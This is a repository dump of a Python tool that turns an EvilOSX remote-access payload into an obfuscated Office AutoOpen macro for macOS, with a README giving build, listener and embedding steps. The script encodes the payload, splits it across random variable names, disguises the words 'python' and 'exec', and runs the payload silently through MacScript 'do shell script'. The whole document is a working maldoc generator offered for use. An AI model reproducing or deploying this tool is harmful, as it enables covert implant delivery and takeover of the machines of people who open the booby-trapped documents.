├── EvilOSX-macrogenerator.py ├── LICENSE ├── README.md └── screenshot1.jpg /EvilOSX-macrogenerator.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from optparse import OptionParser 3 | import sys 4 | import base64 5 | import binascii 6 | import os 7 | import random 8 | from random import randrange 9 | 10 | if ((len(sys.argv) < 5 or len(sys.argv) > 5) and '-h' not in sys.argv): 11 | print("Usage: python3 %s -p -e [\"hex\" or \"b64\"]" % sys.argv[0]) 12 | sys.exit(1) 13 | 14 | parser = OptionParser() 15 | parser.add_option("-p", "--payload", help="EvilOSX python payload") 16 | parser.add_option("-e", "--encoding", help="Type of encoding (hex or base64)") 17 | (options, args) = parser.parse_args() 18 | 19 | payload = options.payload 20 | encoding = options.encoding 21 | 22 | if os.path.exists(payload): 23 | rowcount = randrange(40,60) 24 | with open('%s'%payload, 'r') as file: 25 | data = file.read() 26 | data = data.replace("subprocess.Popen(\"rm -rf \" + __file__, shell=True)","") 27 | 28 | if encoding == "hex": 29 | data2 = binascii.hexlify(data.encode('utf-8')) 30 | elif encoding == "b64": 31 | data2 = base64.b64encode(data.encode('utf-8')) 32 | else: 33 | print("Unsupported encoding option entered. Use -e hex or -e b64. Exiting") 34 | sys.exit(1) 35 | 36 | macrofile = open('macro.txt', 'w') 37 | macrofile.write('Sub AutoOpen()\n') 38 | macrofile.write("a = \"p\" + \"yth\" + \"on\"\n") 39 | macrofile.write("b = \"e\" + \"x\" + \"e\" + \"c\"\n") 40 | macrofile.write("") 41 | 42 | initializer = 0 43 | totallength = len(data2) 44 | chars = 'abcdef' 45 | varname = ''.join(random.choices(chars, k=8)) 46 | while totallength > 0: 47 | if initializer == 0: 48 | int1 = rowcount*initializer 49 | int2 = rowcount + int1 50 | text2 = data2[int1:int2].decode('utf8') 51 | macrofile.write("%s = \"%s\"\n" % (varname,text2)) 52 | totallength = totallength - rowcount 53 | initializer = initializer + 1 54 | else: 55 | int3 = rowcount*initializer 56 | int4 = rowcount + int3 57 | text3 = data2[int3:int4].decode('utf8') 58 | macrofile.write("%s = %s + \"%s\"\n" % (varname,varname,text3)) 59 | totallength = totallength - rowcount 60 | initializer = initializer + 1 61 | 62 | if encoding == "hex": 63 | macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,binascii,sys,socket,commands,os,ssl;\" & b & \"(binascii.unhexlify({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname 64 | elif encoding == "b64": 65 | macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,binascii,sys,socket,commands,os,ssl;\" & b & \"(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname 66 | macrofile.write(macro) 67 | macrofile.write("End Sub\n") 68 | macrofile.close() 69 | 70 | print("-"*100) 71 | print("Happy hunting!") 72 | print('') 73 | print("EvilOSX macro was written to macro.txt in the current working directory. Simply copy it and paste it into your Office document of choice.") 74 | print("DONE!") 75 | 76 | else: 77 | print("[-] File path not found! Exiting") 78 | sys.exit(1) 79 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Cedric Owens 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EvilOSX_MacroGenerator 2 | Python3 script to generate Office macros for the EvilOSX framework (https://github.com/Marten4n6/EvilOSX) 3 | 4 | This script reads in an EvilOSX python launcher and creates a macro with either base64 encoding or hex encoding (based on the command line option specified). Therefore, you will need to pull down EvilOSX and have it drop the python launcher before running the macro generator. See steps below. 5 | 6 | General usage: 7 | 8 | **python3 EvilOSX-macrogenerator.py -p -e <"hex" or "b64">** 9 | 10 | Steps: 11 | 12 | 1. Clone the EvilOSX repo (https://github.com/Marten4n6/EvilOSX) 13 | 2. Install EvilOSX requirements (from EvilOSX root folder: $**sudo pip install -r requirements.txt**) 14 | 3. Generate an EvilOSX python launcher (from EvilOSX root folder: $**python start.py --builder**)...be sure to select the python launcher 15 | 4. Note the path where the python launcher is dropped (by default at /data/builds directory within the EvilOSX root folder) 16 | 5. Start the EvilOSX listener (**python start.py --cli --port **) 17 | 5. Run the macro generator from this repo: **python3 EvilOSX-macrogenerator.py -p -e ["hex" or "b64"]**. You will use the path from #4 above for the -p option here 18 | 6. The macro generator will read the EvilOSX python payload, encode it as either base64 or hex (based on what option you enter) and write the output to a file: 19 | ![Image](screenshot1.jpg) 20 | 7. Copy the contents of macro.txt into an Office doc (Tools -> Macro -> Macros In: [select the document name] -> Enter macro name -> Click plus button -> paste macro contents -> for Word save as .doc or .docm) 21 | 22 | -------------------------------------------------------------------------------- /screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cedowens/EvilOSX_MacroGenerator/f6aa4da13bf9ad9c1179909036565153f69d601c/screenshot1.jpg --------------------------------------------------------------------------------